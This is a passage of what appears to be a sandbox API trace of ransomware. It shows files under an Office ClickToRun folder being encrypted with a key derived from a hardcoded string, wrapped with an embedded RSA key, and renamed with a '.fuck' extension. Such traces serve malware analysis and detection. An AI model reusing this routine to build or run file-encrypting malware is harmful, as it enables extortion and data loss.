CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml"), bFailIfExists=0) returned 0 [0236.410] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml", dwFileAttributes=0x0) returned 0 [0236.410] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml.gsg")) returned 0 [0236.411] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml.fuck")) returned 0 [0236.411] CryptDestroyHash (hHash=0x27170a8) returned 1 [0236.411] CryptDestroyKey (hKey=0x394b28) returned 1 [0236.411] CryptReleaseContext (hProv=0x27e9548, dwFlags=0x0) returned 1 [0236.411] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.411] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.411] GetLastError () returned 0x5 [0236.411] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml")) returned 0x20 [0236.412] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml", dwFileAttributes=0x80) returned 0 [0236.412] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.412] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.413] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.413] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2816870) returned 1 [0236.418] CryptCreateHash (in: hProv=0x2816870, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.418] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.418] CryptHashData (hHash=0x2817358, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.418] CryptDeriveKey (in: hProv=0x2816870, Algid=0x6610, hBaseData=0x2817358, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2817318) returned 1 [0236.418] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.418] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.418] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2816210) returned 1 [0236.420] CryptImportPublicKeyInfo (in: hCryptProv=0x2816210, dwCertEncodingType=0x1, pInfo=0x2809f60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809f90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809f98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2817498) returned 1 [0236.420] CryptEncrypt (in: hKey=0x2817498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.420] CryptEncrypt (in: hKey=0x2817498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2816650*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2816650*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.420] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2816650, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.420] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.420] CryptEncrypt (in: hKey=0x2817318, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.420] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.420] CloseHandle (hObject=0xffffffff) returned 1 [0236.420] CloseHandle (hObject=0xffffffff) returned 1 [0236.420] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml"), bFailIfExists=0) returned 0 [0236.421] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml", dwFileAttributes=0x0) returned 0 [0236.421] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml.gsg")) returned 0 [0236.421] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml.fuck")) returned 0 [0236.422] CryptDestroyHash (hHash=0x2817358) returned 1 [0236.422] CryptDestroyKey (hKey=0x2817318) returned 1 [0236.422] CryptReleaseContext (hProv=0x2816870, dwFlags=0x0) returned 1 [0236.422] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.422] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.422] GetLastError () returned 0x5 [0236.422] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml")) returned 0x20 [0236.423] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", dwFileAttributes=0x80) returned 0 [0236.423] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.424] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.424] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.424] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2815ee0) returned 1 [0236.429] CryptCreateHash (in: hProv=0x2815ee0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.429] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.429] CryptHashData (hHash=0x2817298, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.429] CryptDeriveKey (in: hProv=0x2815ee0, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2816cd8) returned 1 [0236.430] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.430] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.430] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2816ba0) returned 1 [0236.431] CryptImportPublicKeyInfo (in: hCryptProv=0x2816ba0, dwCertEncodingType=0x1, pInfo=0x280a5e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280a610*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280a618*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2817318) returned 1 [0236.431] CryptEncrypt (in: hKey=0x2817318, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.431] CryptEncrypt (in: hKey=0x2817318, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2816078*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2816078*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.431] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2816078, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.431] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.431] CryptEncrypt (in: hKey=0x2816cd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.431] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.432] CloseHandle (hObject=0xffffffff) returned 1 [0236.432] CloseHandle (hObject=0xffffffff) returned 1 [0236.432] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml"), bFailIfExists=0) returned 0 [0236.432] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", dwFileAttributes=0x0) returned 0 [0236.432] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml.gsg")) returned 0 [0236.433] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml.fuck")) returned 0 [0236.434] CryptDestroyHash (hHash=0x2817298) returned 1 [0236.434] CryptDestroyKey (hKey=0x2816cd8) returned 1 [0236.434] CryptReleaseContext (hProv=0x2815ee0, dwFlags=0x0) returned 1 [0236.434] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.434] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.435] GetLastError () returned 0x5 [0236.436] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml")) returned 0x20 [0236.436] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", dwFileAttributes=0x80) returned 0 [0236.436] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.437] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.437] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.437] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28167e8) returned 1 [0236.446] CryptCreateHash (in: hProv=0x28167e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.447] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.447] CryptHashData (hHash=0x28172d8, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.447] CryptDeriveKey (in: hProv=0x28167e8, Algid=0x6610, hBaseData=0x28172d8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2816d98) returned 1 [0236.447] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.447] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.447] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28164b8) returned 1 [0236.449] CryptImportPublicKeyInfo (in: hCryptProv=0x28164b8, dwCertEncodingType=0x1, pInfo=0x28099b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28099e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28099e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2816f98) returned 1 [0236.449] CryptEncrypt (in: hKey=0x2816f98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.449] CryptEncrypt (in: hKey=0x2816f98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28166d8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28166d8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.449] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28166d8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.449] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.450] CryptEncrypt (in: hKey=0x2816d98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.450] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.450] CloseHandle (hObject=0xffffffff) returned 1 [0236.450] CloseHandle (hObject=0xffffffff) returned 1 [0236.450] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml"), bFailIfExists=0) returned 0 [0236.450] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", dwFileAttributes=0x0) returned 0 [0236.451] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml.gsg")) returned 0 [0236.451] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml.fuck")) returned 0 [0236.451] CryptDestroyHash (hHash=0x28172d8) returned 1 [0236.451] CryptDestroyKey (hKey=0x2816d98) returned 1 [0236.451] CryptReleaseContext 